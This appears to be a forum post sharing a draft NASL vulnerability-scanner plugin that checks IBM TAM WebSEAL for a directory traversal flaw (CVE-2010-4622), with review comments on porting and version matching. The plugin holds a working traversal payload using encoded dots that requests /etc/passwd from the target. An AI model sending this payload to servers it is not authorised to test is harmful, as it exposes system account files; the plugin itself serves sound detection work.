Recently, I saw a year-old bug get exploited in a pen test and wondered
why it hadn't been found in previous scans. When I looked, I wasn't able
to find a check for it, so I attempted to write my own. It is a bug that
affects IBM TAM WebSEAL; while some reports show it only working on AIX,
I saw it work on other *nix platforms, and I saw code execution work.

I attempted to look through the documentation and at other plugin files to
figure out how to write one of these things. One thing that still confuses
me is that I want the check to run on both port 80 and 443, but I'm not sure
I'm doing that part right. Please feel free to shred it up; I'm hoping to
learn more through this. There are still some lines in there that I'm using
for debugging.
-------------------
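if( description )
{
  script_id(33333);
  script_version ("$Revision:0.1$");
  # Name kept on one source line: the original literal spanned two lines, so
  # the registered plugin name carried an embedded newline.
  script_name(english:"IBM Tivoli Access Manager for e-business WebSEAL URL Traversal Arbitrary File Access");
  desc =
"There is a directory traversal flaw in WebSEAL versions <= 6.1.1. Some
reports show it only affecting AIX, but
testing has shown other operating systems to be vulnerable and code
execution has been shown to work.

Risk Factor : High";

  script_description(desc);
  script_summary(english:"WebSEAL traversal check");
  # ACT_GATHER_INFO: the probe is a single GET for a file; nothing is modified
  # on the target.
  script_category(ACT_GATHER_INFO);
  script_family(english:"Remote file access");
  script_copyright(english:"This script is Copyright (C) 2011 name");
  script_cve_id("CVE-2010-4622");
  # http_version.nasl is what records the Services/www ports in the KB that
  # get_http_port() reads in the attack section. (The unsuffixed spelling
  # "script_dependencie" is the API name in this generation of NASL —
  # verify against your scanner's headers.)
  script_dependencie("http_version.nasl");
  # Run against every detected Services/www port; 80 and 443 are the fallback
  # ports when none was detected.
  script_require_ports("Services/www", 80, 443);
  exit(0);
}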

include ("http_func.inc");
include ("http_keepalive.inc");

# Choose the web port to probe. get_http_port() hands back the Services/www
# port recorded in the KB and only falls back to default: when the KB has
# none. Because of script_require_ports() in the description section the
# scanner is expected to fork this script once per detected www port, so the
# explicit 443 retry below only matters when nothing was detected and 80 is
# closed -- NOTE(review): confirm the per-port forking behaviour against your
# scanner before relying on it for the "both 80 and 443" requirement.
port = get_http_port(default:80);
if (!get_port_state(port)) port = get_http_port(default:443);
if (!get_port_state(port)) exit(0);

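# Version gate: only send the probe when the Server header reports a WebSEAL
# release in the affected range (<= 6.1.1 per the description). No banner at
# all means nothing to match on, so bail out quietly instead of passing NULL
# through strstr()/ereg().
banner = get_http_banner(port:port);
if (!banner) exit(0);

# HTTP header names are case-insensitive; match the Server line with icase
# instead of trying "server" and "Server" by hand.
serv = egrep(pattern:"^Server:", string:banner, icase:TRUE);
if (!serv) exit(0);

# The dot is escaped -- in the original pattern an unescaped "." matched any
# character -- and the trailing group keeps "6.1" from also matching a
# hypothetical "6.10". The pattern accepts 6.0.x/6.1.x (and x.0/x.1 for
# earlier majors) without looking at the third version component
# -- NOTE(review): tighten once the first fixed build is known; the
# "Not vulnerable" display() debugging output was dropped.
if (!ereg(pattern:"WebSEAL/[0-6]\.[01]([^0-9]|$)", string:serv)) exit(0);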

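# Traversal vector for CVE-2010-4622 (see script_cve_id above): %uff0e is the
# URL-encoded fullwidth full stop standing in for ".". The literal is a NASL
# double-quoted ("pure") string, so the backslash before the fourth segment is
# sent to the server exactly as written -- NOTE(review): keep it byte-identical
# to the request that was proven in the pen test, or confirm it is not a typo
# for "/".
dir_trav = "/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e\%uff0e%uff0e/etc/passwd";

req = http_get(item:dir_trav, port:port);
res = http_keepalive_send_recv(port:port, data:req);
if (!res) exit(0);

# A bare "200 OK" is not evidence: many front ends answer 200 with a login or
# error page for any path, which would make this check fire on every WebSEAL
# in range. Require the status line AND the root entry of a real passwd file
# in the response before reporting. The display(res) debugging output is gone.
if (ereg(pattern:"^HTTP/[0-9]\.[0-9] 200 ", string:res) &&
    egrep(pattern:"root:.*:0:[01]:", string:res))
{
  security_hole(port);
}
exit(0);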